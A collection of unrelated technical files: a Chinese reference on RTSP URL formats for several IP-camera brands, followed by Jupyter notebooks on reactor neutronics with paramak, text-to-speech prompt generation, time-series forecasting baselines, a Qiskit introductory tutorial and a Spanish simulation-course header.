> rtsp://username:password@<address>:<port>/Streaming/Channels/<id>(?parm1=value1&parm2-=value2…)
举例说明:
DS-9632N-ST的IP通道01主码流:
rtsp://admin:12345@172.6.22.234:554/Streaming/Channels/101?transportmode=unicast
DS-9016HF-ST的IP通道01主码流:
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/1701?transportmode=unicast
DS-9016HF-ST的模拟通道01子码流:
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/102?transportmode=unicast (单播)
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/102?transportmode=multicast (多播)
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/102 (?后面可省略,默认单播)
DS-9016HF-ST的零通道主码流(零通道无子码流):
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/001
DS-2DF7274-A的第三码流:
rtsp://admin:12345@172.6.10.11:554/Streaming/Channels/103
更多信息:https://blog.csdn.net/xiejiashu/article/details/71786187
## 大华
>rtsp://[username]:[password]@[ip]:[port]/cam/realmonitor?[channel]&[subtype]
说明:
- username: 用户名。例如admin。
- password: 密码。例如admin。
- ip: 为设备IP。例如 10.7.8.122。
- port: 端口号默认为554,若为默认可不填写。
- channel: 通道号,起始为1。例如通道2,则为channel=2。
- subtype: 码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)。
**例如**,请求某设备的通道2的辅码流,Url如下
rtsp://admin:admin@10.12.4.84:554/cam/realmonitor?channel=2&subtype=1
## D-Link
>rtsp://[username]:[password]@[ip]:[port]/[channel].sdp
说明:
- username:用户名。例如admin
- password:密码。例如12345,如果没有网络验证可直接写成rtsp:// [ip]:[port]/[channel].sdp
- ip:为设备IP。例如192.168.0.108。
- port:端口号默认为554,若为默认可不填写。
- channel:通道号,起始为1。例如通道2,则为live2。
**例如**,请求某设备的通道2的码流,URL如下
rtsp://admin:12345@192.168.200.201:554/live2.sdp
## Axis(安讯士)
>rtsp://[username]:[password]@[ip]/axis-media/media.amp?[videocodec]&[resolution]
说明:
- username:用户名。例如admin
- password:密码。例如12345,如果没有网络验证可省略用户名密码部分以及@字符。
- ip:为设备IP。例如192.168.0.108。
- videocodec:支持MPEG、h.264等,可缺省。
- resolution:分辨率,如resolution=1920x1080,若采用默认分辨率,可缺省此参数。
**例如**,请求某设备h264编码的1280x720的码流,URL如下:
rtsp:// 192.168.200.202/axis-media/media.amp?videocodec=h264&resolution=1280x720
---
内容来源:
- https://blog.csdn.net/viola_lulu/article/details/53330727
- https://blog.csdn.net/xiejiashu/article/details/71786187
|
github_jupyter
|
# Heating Mesh Tally on CAD geometry made from Shapes
This constructs a reactor geometry from 3 Shape objects each made from points.
The Shapes made include a breeder blanket, PF coil and a central column shield.
2D and 3D Meshes tally are then simulated to show nuclear heating, flux and tritium_production across the model.
This makes a 3D geometry and material for PF coil
```
import paramak
pf_coil = paramak.RotateStraightShape(
points=[
(700, 0),
(750, 0),
(750, 50),
(700, 50)
],
stp_filename = 'pf_coil.stp',
material_tag = 'pf_coil_material'
)
pf_coil.solid
```
This makes a 3D geometry and material for the centre column
```
center_column = paramak.RotateMixedShape(
points=[
(50, 600, 'straight'),
(150, 600, 'spline'),
(100, 0, 'spline'),
(150, -600, 'straight'),
(50, -600, 'straight')
],
stp_filename = 'center_column.stp',
material_tag = 'center_column_material'
)
center_column.solid
```
This makes a 3D geometry and material for breeder blanket. The azimuth_placement_angle argument is used to repeat the geometry around the Z axis at specified angles.
```
blanket = paramak.RotateSplineShape(
points=[
(600, 0),
(600, -20),
(500, -300),
(400, -300),
(400, 0),
(400, 300),
(500, 300),
(600, 20)
],
rotation_angle=40,
azimuth_placement_angle=[0, 45, 90, 135, 180, 225, 270, 315],
stp_filename = 'blanket.stp',
material_tag = 'blanket_material'
)
blanket.solid
```
This makes a reactor object from the three components
```
my_reactor = paramak.Reactor([blanket, pf_coil,center_column])
my_reactor.solid
```
At this stage we can export the reactor geometry as stp files and make them avaialbe from download and viewing in FreeCAD.
```
my_reactor.export_stp()
from IPython.display import FileLink
display(FileLink('blanket.stp'))
display(FileLink('pf_coil.stp'))
display(FileLink('center_column.stp'))
display(FileLink('Graveyard.stp'))
```
The next section defines the materials. This can be done using openmc.Materials or in this case strings that look up materials from the neutronics material maker.
```
from neutronics_material_maker import Material
mat1 = Material(material_name='Li4SiO4',
material_tag='blanket_material')
mat2 = Material(material_name='copper',
material_tag='pf_coil_material')
mat3 = Material(material_name='WC',
material_tag='center_column_material')
```
This next step makes a simple point source
```
import openmc
# initialises a new source object
source = openmc.Source()
# sets the location of the source to x=0 y=0 z=0
source.space = openmc.stats.Point((100, 0, 0))
# sets the direction to isotropic
source.angle = openmc.stats.Isotropic()
# sets the energy distribution to 100% 14MeV neutrons
source.energy = openmc.stats.Discrete([14e6], [1])
```
This next section combines the geometry with the materials and specifies a few mesh tallies
```
neutronics_model = paramak.NeutronicsModel(
geometry=my_reactor,
mesh_tally_2d=['heating', 'flux', '(n,Xt)'],
mesh_tally_3d=['heating', 'flux', '(n,Xt)'],
source=source,
simulation_batches=10,
simulation_particles_per_batch=1000,
materials={
'blanket_material': mat1,
'pf_coil_material': mat2,
'center_column_material': mat3,
}
)
neutronics_model.simulate()
```
The next section produces download links for:
- vtk files that contain the 3D mesh results (open with Paraview)
- png images that show the resuls of the 2D mesh tally
```
from IPython.display import FileLink
display(FileLink('heating_on_3D_mesh.vtk'))
display(FileLink('flux_on_3D_mesh.vtk'))
display(FileLink('tritium_production_on_3D_mesh.vtk'))
display(FileLink('flux_on_2D_mesh_xy.png'))
display(FileLink('flux_on_2D_mesh_xz.png'))
display(FileLink('flux_on_2D_mesh_yz.png'))
display(FileLink('heating_on_2D_mesh_xy.png'))
display(FileLink('heating_on_2D_mesh_xz.png'))
display(FileLink('heating_on_2D_mesh_yz.png'))
display(FileLink('tritium_production_on_2D_mesh_yz.png'))
display(FileLink('tritium_production_on_2D_mesh_xz.png'))
display(FileLink('tritium_production_on_2D_mesh_yz.png'))
```
|
github_jupyter
|
```
from gtts import gTTS
LANG_PATH = '../lang/{0}/speech/{1}.mp3'
tts = gTTS(text='Se ha detectado más de una persona, inténtelo de nuevo con una persona sólo por favor', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'more_than_one_face'))
tts = gTTS(text='There appears to be more than one person, try again with one person only please', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'more_than_one_face'))
tts = gTTS(text='ha sido guardado correctamente', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'saved'))
tts = gTTS(text='has been saved correctly', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'saved'))
tts = gTTS(text='diga el nombre de la persona detectada o cancelar después del pitido por favor', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'who'))
tts = gTTS(text='say the name of the person detected or cancel after the beep please', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'who'))
tts = gTTS(text='guardando', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'saving'))
tts = gTTS(text='saving', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'saving'))
tts = gTTS(text='un momento por favor', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'one_moment'))
tts = gTTS(text='one moment please', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'one_moment'))
tts = gTTS(text='lo siento, no he entendido bien', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'not_understand'))
tts = gTTS(text='sorry, I didn´t catch that', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'not_understand'))
tts = gTTS(text='cancelado', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'canceled'))
tts = gTTS(text='canceled', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'canceled'))
tts = gTTS(text='seleccione una opción. O diga: Comandos. Para oir una lista de comandos sonoros. O: Teclas. Para oir una lista de comandos de entrada.', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'choose'))
tts = gTTS(text='select an option. Or say Options to hear a list of available commands. Or say Keys to hear a list of available keys', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'choose'))
tts = gTTS(text='seleccione una opción', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'choose_short'))
tts = gTTS(text='select an option', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'choose_short'))
tts = gTTS(text='Diga: ¿Quién? Para obtener una descripción de las personas en la imagen. Diga: ¿Qué? Para obtener una descripción general de la imagen. Diga: Guardar. Para guardar en el sistema el nombre de la persona en la imagen. Diga: Idioma. Para cambiar el idioma al siguiente disponible. Diga: Cancelar. Para continuar o diga: Repetir: Para repetir las opciones. ', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'commands'))
tts = gTTS(text='Say: Who. To get a description of the people in the image. Say: What. To get a general description of the image. Say: Save. To save the name of the person in the image. Say: Language. To change the language. Say: Cancel. To continue. Say: Repeat. To repeat the list of available options', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'commands'))
tts = gTTS(text='Pulse "A". Para obtener una descripción de las personas en la imagen. Pulse "Z". Para obtener una descripción general de la imagen. Pulse "S". Para guardar en el sistema el nombre de la persona en la imagen. Pulse "L". Para cambiar el idioma al siguiente disponible. Pulse "Q". Para continuar o pulse: "R": Para repetir las opciones. ', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'keys'))
tts = gTTS(text='Press "A". To get a description of the people in the image. Press "Z". To get a general description of the image. Press "S". To save the name of the person in the image. Press "L". To change the language. Press "Q". To continue. Press "R". To repeat the list of available options', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'keys'))
tts = gTTS(text='Idioma cambiado a español', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'lang_change'))
tts = gTTS(text='Language has been changed to english', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'lang_change'))
tts = gTTS(text='De acuerdo', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'ok'))
tts = gTTS(text='OK', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'ok'))
tts = gTTS(text='Lo siento, no te he entendido', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'sorry_understand'))
tts = gTTS(text='Sorry, I didn not get that', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'sorry_understand'))
tts = gTTS(text='¿Quieres que repita las opciones disponibles?', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'repeat_options'))
tts = gTTS(text='Do you want me to repeat the available options?', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'repeat_options'))
tts = gTTS(text='Lo siento, no soy capaz de describir la imagen', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'no_image'))
tts = gTTS(text='Sorry, I cannot understand what''s in the image', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'no_image'))
from gtts import gTTS
tts = gTTS(text='Pulse, A. Para obtener una descripción de las personas en la imagen. Pulse "Z". Para obtener una descripción general de la imagen. Pulse "S". Para guardar en el sistema el nombre de la persona en la imagen. Pulse "L". Para cambiar el idioma al siguiente disponible. Pulse "Q". Para continuar o pulse: "R": Para repetir las opciones. ', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'keys'))
words = ['man', 'woman', 'angry', 'disgust', 'happy', 'neutral', 'sad', 'surprise']
words_es_h = ['hombre', 'mujer', 'enfadado', 'asqueado', 'contento', 'neutral', 'triste', 'sorprendido']
words_es_m = ['hombre', 'mujer', 'enfadada', 'asqueada', 'contenta', 'neutral', 'triste', 'sorprendida']
for i in range(len(words)):
tts = gTTS(text=words[i], lang='en', slow=False)
tts.save("en/" + words[i] + ".wav")
tts = gTTS(text=words_es_h[i], lang='es', slow=False)
tts.save("esh/" + words[i] + ".wav")
tts = gTTS(text=words_es_m[i], lang='es', slow=False)
tts.save("esm/" + words[i] + ".wav")
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/MoRebaie/Sequences-Time-Series-Prediction-in-Tensorflow/blob/master/Course_4_Week_1_Exercise_Question.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
!pip install tensorflow==2.0.0b1
import tensorflow as tf
print(tf.__version__)
# EXPECTED OUTPUT
# 2.0.0-beta1 (or later)
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow import keras
def plot_series(time, series, format="-", start=0, end=None):
plt.plot(time[start:end], series[start:end], format)
plt.xlabel("Time")
plt.ylabel("Value")
plt.grid(True)
def trend(time, slope=0):
return slope * time
def seasonal_pattern(season_time):
"""Just an arbitrary pattern, you can change it if you wish"""
return np.where(season_time < 0.1,
np.cos(season_time * 7 * np.pi),
1 / np.exp(5 * season_time))
def seasonality(time, period, amplitude=1, phase=0):
"""Repeats the same pattern at each period"""
season_time = ((time + phase) % period) / period
return amplitude * seasonal_pattern(season_time)
def noise(time, noise_level=1, seed=None):
rnd = np.random.RandomState(seed)
return rnd.randn(len(time)) * noise_level
time = np.arange(4 * 365 + 1, dtype="float32")
baseline = 10
series = trend(time, 0.1)
baseline = 10
amplitude = 40
slope = 0.01
noise_level = 2
# Create the series
series = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)
# Update with noise
series += noise(time, noise_level, seed=42)
plt.figure(figsize=(10, 6))
plot_series(time, series)
plt.show()
# EXPECTED OUTPUT
# Chart as in the screencast. First should have 5 distinctive 'peaks'
```
Now that we have the time series, let's split it so we can start forecasting
```
split_time = 1100 # YOUR CODE HERE
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
plt.figure(figsize=(10, 6))
plot_series(time_train, x_train)
plt.show()
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plt.show()
# EXPECTED OUTPUT
# Chart WITH 4 PEAKS between 50 and 65 and 3 troughs between -12 and 0
# Chart with 2 Peaks, first at slightly above 60, last at a little more than that, should also have a single trough at about 0
```
# Naive Forecast
```
naive_forecast = series[split_time -1 : -1]#YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plot_series(time_valid, naive_forecast)
# Expected output: Chart similar to above, but with forecast overlay
```
Let's zoom in on the start of the validation period:
```
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid, start = 0, end = 150)# YOUR CODE HERE
plot_series(time_valid, naive_forecast, start = 1, end = 151)# YOUR CODE HERE
# EXPECTED - Chart with X-Axis from 1100-1250 and Y Axes with series value and projections. Projections should be time stepped 1 unit 'after' series
```
Now let's compute the mean squared error and the mean absolute error between the forecasts and the predictions in the validation period:
```
print(keras.metrics.mean_squared_error(x_valid, naive_forecast).numpy()) # YOUR CODE HERE
print(keras.metrics.mean_absolute_error(x_valid, naive_forecast).numpy())# YOUR CODE HERE
# Expected Output
# 19.578304
# 2.6011968
```
That's our baseline, now let's try a moving average:
```
def moving_average_forecast(series, window_size):
"""Forecasts the mean of the last few values.
If window_size=1, then this is equivalent to naive forecast"""
forecast = []
for time in range(len(series) - window_size):
forecast.append(series[time:time + window_size].mean())
return np.array(forecast)
# YOUR CODE HERE
moving_avg = moving_average_forecast(series, 30)[split_time - 30:]# YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plot_series(time_valid, moving_avg)
# EXPECTED OUTPUT
# CHart with time series from 1100->1450+ on X
# Time series plotted
# Moving average plotted over it
print(keras.metrics.mean_squared_error(x_valid, moving_avg).numpy())# YOUR CODE HERE
print(keras.metrics.mean_absolute_error(x_valid, moving_avg).numpy())# YOUR CODE HERE
# EXPECTED OUTPUT
# 65.786224
# 4.3040023
diff_series = (series[365:] - series[:-365])# YOUR CODE HERE
diff_time = time[365:] # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(diff_time, diff_series)
plt.show()
# EXPECETED OUTPUT: CHart with diffs
```
Great, the trend and seasonality seem to be gone, so now we can use the moving average:
```
diff_moving_avg = moving_average_forecast(diff_series, 50)[split_time - 365 - 50:] # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, diff_series[split_time - 365:]) # YOUR CODE HERE
plot_series(time_valid, diff_moving_avg)# YOUR CODE HERE
plt.show()
# Expected output. Diff chart from 1100->1450 +
# Overlaid with moving average
```
Now let's bring back the trend and seasonality by adding the past values from t – 365:
```
diff_moving_avg_plus_past = series[split_time - 365:-365] + diff_moving_avg # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)# YOUR CODE HERE
plot_series(time_valid, diff_moving_avg_plus_past)# YOUR CODE HERE
plt.show()
# Expected output: Chart from 1100->1450+ on X. Same chart as earlier for time series, but projection overlaid looks close in value to it
print(keras.metrics.mean_squared_error(x_valid, diff_moving_avg_plus_past).numpy())# YOUR CODE HERE
print(keras.metrics.mean_absolute_error(x_valid, diff_moving_avg_plus_past).numpy())# YOUR CODE HERE
# EXPECTED OUTPUT
# 8.498155
# 2.327179
```
Better than naive forecast, good. However the forecasts look a bit too random, because we're just adding past values, which were noisy. Let's use a moving averaging on past values to remove some of the noise:
```
diff_moving_avg_plus_smooth_past = moving_average_forecast(series[split_time - 370:-360], 10) + diff_moving_avg # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)# YOUR CODE HERE
plot_series(time_valid, diff_moving_avg_plus_smooth_past)# YOUR CODE HERE
plt.show()
# EXPECTED OUTPUT:
# Similar chart to above, but the overlaid projections are much smoother
print(keras.metrics.mean_squared_error(x_valid, diff_moving_avg_plus_smooth_past).numpy())# YOUR CODE HERE
print(keras.metrics.mean_absolute_error(x_valid, diff_moving_avg_plus_smooth_past).numpy())# YOUR CODE HERE
# EXPECTED OUTPUT
# 12.527958
# 2.2034433
```
|
github_jupyter
|
<img src="../../images/qiskit-heading.gif" alt="Note: In order for images to show up in this jupyter notebook you need to select File => Trusted Notebook" width="500 px" align="left">
# Getting Started with Qiskit
Here, we provide an overview of working with Qiskit. Qiskit provides the basic building blocks necessary to program quantum computers. The basic concept of Qiskit is an array of quantum circuits. A workflow using Qiskit consists of two stages: **Build** and **Execute**. **Build** allows you to make different quantum circuits that represent the problem you are solving, and **Execute** allows you to run them on different backends. After the jobs have been run, the data is collected. There are methods for putting this data together, depending on the program. This either gives you the answer you wanted, or allows you to make a better program for the next instance.
**Contents**
[Circuit basics](#circuit_basics)
[Simulating circuits with Qiskit Aer](#aer_simulation)
[Running circuits using the IBMQ provider](#ibmq_provider)
**Code imports**
```
import numpy as np
from qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister
from qiskit import execute
```
## Circuit Basics <a id='circuit_basics'></a>
### Building the circuit
The basic elements needed for your first program are the QuantumCircuit, and QuantumRegister.
```
# Create a Quantum Register with 3 qubits.
q = QuantumRegister(3, 'q')
# Create a Quantum Circuit acting on the q register
circ = QuantumCircuit(q)
```
<div class="alert alert-block alert-info">
<b>Note:</b> Naming the QuantumRegister is optional and not required.
</div>
After you create the circuit with its registers, you can add gates ("operations") to manipulate the registers. As you proceed through the documentation you will find more gates and circuits; the below is an example of a quantum circuit that makes a three-qubit GHZ state
$$|\psi\rangle = \left(|000\rangle+|111\rangle\right)/\sqrt{2}.$$
To create such a state, we start with a 3-qubit quantum register. By default, each qubit in the register is initialized to $|0\rangle$. To make the GHZ state, we apply the following gates:
* A Hadamard gate $H$ on qubit 0, which puts it into a superposition state.
* A controlled-Not operation ($C_{X}$) between qubit 0 and qubit 1.
* A controlled-Not operation between qubit 0 and qubit 2.
On an ideal quantum computer, the state produced by running this circuit would be the GHZ state above.
In Qiskit, operations can be added to the circuit one-by-one, as shown below.
```
# Add a H gate on qubit 0, putting this qubit in superposition.
circ.h(q[0])
# Add a CX (CNOT) gate on control qubit 0 and target qubit 1, putting
# the qubits in a Bell state.
circ.cx(q[0], q[1])
# Add a CX (CNOT) gate on control qubit 0 and target qubit 2, putting
# the qubits in a GHZ state.
circ.cx(q[0], q[2])
```
## Visualize Circuit
You can visualize your circuit using Qiskit `QuantumCircuit.draw()`, which plots circuit in the form found in many textbooks.
```
circ.draw()
```
In this circuit, the qubits are put in order with qubit zero at the top and qubit two at the bottom. The circuit is read left-to-right (meaning that gates which are applied earlier in the circuit show up further to the left).
## Simulating circuits using Qiskit Aer <a id='aer_simulation'></a>
Qiskit Aer is our package for simulating quantum circuits. It provides many different backends for doing a simulation. Here we use the basic python version.
### Statevector backend
The most common backend in Qiskit Aer is the `statevector_simulator`. This simulator returns the quantum
state which is a complex vector of dimensions $2^n$ where $n$ is the number of qubits
(so be careful using this as it will quickly get too large to run on your machine).
<div class="alert alert-block alert-info">
When representing the state of a multi-qubit system, the tensor order used in qiskit is different than that use in most physics textbooks. Suppose there are $n$ qubits, and qubit $j$ is labeled as $Q_{j}$. In most textbooks (such as Nielsen and Chuang's "Quantum Computation and Information"), the basis vectors for the $n$-qubit state space would be labeled as $Q_{0}\otimes Q_{1} \otimes \cdots \otimes Q_{n}$. **This is not the ordering used by qiskit!** Instead, qiskit uses an ordering in which the $n^{\mathrm{th}}$ qubit is on the <em><strong>left</strong></em> side of the tensor product, so that the basis vectors are labeled as $Q_n\otimes \cdots \otimes Q_1\otimes Q_0$.
For example, if qubit zero is in state 0, qubit 1 is in state 0, and qubit 2 is in state 1, qiskit would represent this state as $|100\rangle$, whereas most physics textbooks would represent it as $|001\rangle$.
This difference in labeling affects the way multi-qubit operations are represented as matrices. For example, qiskit represents a controlled-X ($C_{X}$) operation with qubit 0 being the control and qubit 1 being the target as
$$C_X = \begin{pmatrix} 1 & 0 & 0 & 0 \\ 0 & 0 & 0 & 1 \\ 0 & 0 & 1 & 0 \\ 0 & 1 & 0 & 0 \\\end{pmatrix}.$$
</div>
To run the above circuit using the statevector simulator, first you need to import Aer and then set the backend to `statevector_simulator`.
```
# Import Aer
from qiskit import BasicAer
# Run the quantum circuit on a statevector simulator backend
backend = BasicAer.get_backend('statevector_simulator')
```
Now we have chosen the backend it's time to compile and run the quantum circuit. In Qiskit we provide the `execute` function for this. ``execute`` returns a ``job`` object that encapsulates information about the job submitted to the backend.
<div class="alert alert-block alert-info">
<b>Tip:</b> You can obtain the above parameters in Jupyter. Simply place the text cursor on a function and press Shift+Tab.
</div>
```
# Create a Quantum Program for execution
job = execute(circ, backend)
```
When you run a program, a job object is made that has the following two useful methods:
`job.status()` and `job.result()` which return the status of the job and a result object respectively.
<div class="alert alert-block alert-info">
<b>Note:</b> Jobs run asynchronously but when the result method is called it switches to synchronous and waits for it to finish before moving on to another task.
</div>
```
result = job.result()
```
The results object contains the data and Qiskit provides the method
`result.get_statevector(circ)` to return the state vector for the quantum circuit.
```
outputstate = result.get_statevector(circ, decimals=3)
print(outputstate)
```
Qiskit also provides a visualization toolbox to allow you to view these results.
Below, we use the visualization function to plot the real and imaginary components of the state vector.
```
from qiskit.tools.visualization import plot_state_city
plot_state_city(outputstate)
```
### Unitary backend
Qiskit Aer also includes a `unitary_simulator` that works _provided all the elements in the circuit are unitary operations_. This backend calculates the $2^n \times 2^n$ matrix representing the gates in the quantum circuit.
```
# Run the quantum circuit on a unitary simulator backend
backend = BasicAer.get_backend('unitary_simulator')
job = execute(circ, backend)
result = job.result()
# Show the results
print(result.get_unitary(circ, decimals=3))
```
### OpenQASM backend
The simulators above are useful because they provide information about the state output by the ideal circuit and the matrix representation of the circuit. However, a real experiment terminates by _measuring_ each qubit (usually in the computational $|0\rangle, |1\rangle$ basis). Without measurement, we cannot gain information about the state. Measurements cause the quantum system to collapse into classical bits.
For example, suppose we make independent measurements on each qubit of the three-qubit GHZ state
$$|\psi\rangle = |000\rangle +|111\rangle)/\sqrt{2},$$
and let $xyz$ denote the bitstring that results. Recall that, under the qubit labeling used by Qiskit, $x$ would correspond to the outcome on qubit 2, $y$ to the outcome on qubit 1, and $z$ to the outcome on qubit 0. This representation of the bitstring puts the most significant bit (MSB) on the left, and the least significant bit (LSB) on the right. This is the standard ordering of binary bitstrings. We order the qubits in the same way, which is why Qiskit uses a non-standard tensor product order.
The probability of obtaining outcome $xyz$ is given by
$$\mathrm{Pr}(xyz) = |\langle xyz | \psi \rangle |^{2}.$$
By explicit computation, we see there are only two bitstrings that will occur: $000$ and $111$. If the bitstring $000$ is obtained, the state of the qubits is $|000\rangle$, and if the bitstring is $111$, the qubits are left in the state $|111\rangle$. The probability of obtaining 000 or 111 is the same; namely, 1/2:
$$\begin{align}
\mathrm{Pr}(000) &= |\langle 000 | \psi \rangle |^{2} = \frac{1}{2}\\
\mathrm{Pr}(111) &= |\langle 111 | \psi \rangle |^{2} = \frac{1}{2}.
\end{align}$$
To simulate a circuit that includes measurement, we need to add measurements to the original circuit above, and use a different Aer backend.
```
# Create a Classical Register with 3 bits.
c = ClassicalRegister(3, 'c')
# Create a Quantum Circuit
meas = QuantumCircuit(q, c)
meas.barrier(q)
# map the quantum measurement to the classical bits
meas.measure(q,c)
# The Qiskit circuit object supports composition using
# the addition operator.
qc = circ+meas
#drawing the circuit
qc.draw()
```
This circuit adds a classical register, and three measurements that are used to map the outcome of qubits to the classical bits.
To simulate this circuit, we use the ``qasm_simulator`` in Qiskit Aer. Each run of this circuit will yield either the bitstring 000 or 111. To build up statistics about the distribution of the bitstrings (to, e.g., estimate $\mathrm{Pr}(000)$), we need to repeat the circuit many times. The number of times the circuit is repeated can be specified in the ``execute`` function, via the ``shots`` keyword.
```
# Use Aer's qasm_simulator
backend_sim = BasicAer.get_backend('qasm_simulator')
# Execute the circuit on the qasm simulator.
# We've set the number of repeats of the circuit
# to be 1024, which is the default.
job_sim = execute(qc, backend_sim, shots=1024)
# Grab the results from the job.
result_sim = job_sim.result()
```
Once you have a result object, you can access the counts via the function `get_counts(circuit)`. This gives you the _aggregated_ binary outcomes of the circuit you submitted.
```
counts = result_sim.get_counts(qc)
print(counts)
```
Approximately 50 percent of the time the output bitstring is 000. Qiskit also provides a function `plot_histogram` which allows you to view the outcomes.
```
from qiskit.tools.visualization import plot_histogram
plot_histogram(counts)
```
The estimated outcome probabilities $\mathrm{Pr}(000)$ and $\mathrm{Pr}(111)$ are computed by taking the aggregate counts and dividing by the number of shots (times the circuit was repeated). Try changing the ``shots`` keyword in the ``execute`` function and see how the estimated probabilities change.
## Running circuits using the IBMQ provider <a id='ibmq_provider'></a>
To faciliate access to real quantum computing hardware, we have provided a simple API interface.
To access IBMQ devices, you'll need an API token. For the public IBM Q devices, you can generate an API token [here](https://quantumexperience.ng.bluemix.net/qx/account/advanced) (create an account if you don't already have one). For Q Network devices, login to the q-console, click your hub, group, and project, and expand "Get Access" to generate your API token and access url.
Our IBMQ provider lets you run your circuit on real devices or on our HPC simulator. Currently, this provider exists within Qiskit, and can be imported as shown below. For details on the provider, see [The IBMQ Provider](the_ibmq_provider.ipynb).
```
from qiskit import IBMQ
```
After generating your API token, call: `IBMQ.save_account('MY_TOKEN')`. For Q Network users, you'll also need to include your access url: `IBMQ.save_account('MY_TOKEN', 'URL')`
This will store your IBMQ credentials in a local file. Unless your registration information has changed, you only need to do this once. You may now load your accounts by calling,
```
IBMQ.load_accounts()
```
Once your account has been loaded, you can view the list of backends available to you.
```
print("Available backends:")
IBMQ.backends()
```
### Running circuits on real devices
Today's quantum information processors are small and noisy, but are advancing at a fast pace. They provide a great opportunity to explore what [noisy, intermediate-scale quantum (NISQ)](https://arxiv.org/abs/1801.00862) computers can do.
The IBMQ provider uses a queue to allocate the devices to users. We now choose a device with the least busy queue which can support our program (has at least 3 qubits).
```
from qiskit.providers.ibmq import least_busy
large_enough_devices = IBMQ.backends(filters=lambda x: x.configuration().n_qubits > 4 and
not x.configuration().simulator)
backend = least_busy(large_enough_devices)
print("The best backend is " + backend.name())
```
To run the circuit on the backend, we need to specify the number of shots and the number of credits we are willing to spend to run the circuit. Then, we execute the circuit on the backend using the ``execute`` function.
```
from qiskit.tools.monitor import job_monitor
shots = 1024 # Number of shots to run the program (experiment); maximum is 8192 shots.
max_credits = 3 # Maximum number of credits to spend on executions.
job_exp = execute(qc, backend=backend, shots=shots, max_credits=max_credits)
job_monitor(job_exp)
```
``job_exp`` has a ``.result()`` method that lets us get the results from running our circuit.
<div class="alert alert-block alert-info">
<b>Note:</b> When the .result() method is called, the code block will wait until the job has finished before releasing the cell.
</div>
```
result_exp = job_exp.result()
```
Like before, the counts from the execution can be obtained using ```get_counts(qc)```
```
counts_exp = result_exp.get_counts(qc)
plot_histogram([counts_exp,counts])
```
### Simulating circuits using a HPC simulator
The IBMQ provider also comes with a remote optimized simulator called ``ibmq_qasm_simulator``. This remote simulator is capable of simulating up to 32 qubits. It can be used the
same way as the remote real backends.
```
backend = IBMQ.get_backend('ibmq_qasm_simulator', hub=None)
shots = 1024 # Number of shots to run the program (experiment); maximum is 8192 shots.
max_credits = 3 # Maximum number of credits to spend on executions.
job_hpc = execute(qc, backend=backend, shots=shots, max_credits=max_credits)
result_hpc = job_hpc.result()
counts_hpc = result_hpc.get_counts(qc)
plot_histogram(counts_hpc)
```
### Retrieving a previously ran job
If your experiment takes longer to run then you have time to wait around, or if you simply want to retrieve old jobs back, the IBMQ backends allow you to do that.
First you would need to note your job's ID:
```
jobID = job_exp.job_id()
print('JOB ID: {}'.format(jobID))
```
Given a job ID, that job object can be later reconstructed from the backend using retrieve_job:
```
job_get=backend.retrieve_job(jobID)
```
and then the results can be obtained from the new job object.
```
job_get.result().get_counts(qc)
```
|
github_jupyter
|
____
__Universidad Tecnológica Nacional, Buenos Aires__\
__Ingeniería Industrial__\
__Cátedra de Investigación Operativa__\
__Autor: Martín Palazzo__ (Mpalazzo@frba.utn.edu.ar) y __Rodrigo Maranzana__ (Rmaranzana@frba.utn.edu.ar)
____
# Simulación con distribución Exponencial
<h1>Índice<span class="tocSkip"></span></h1>
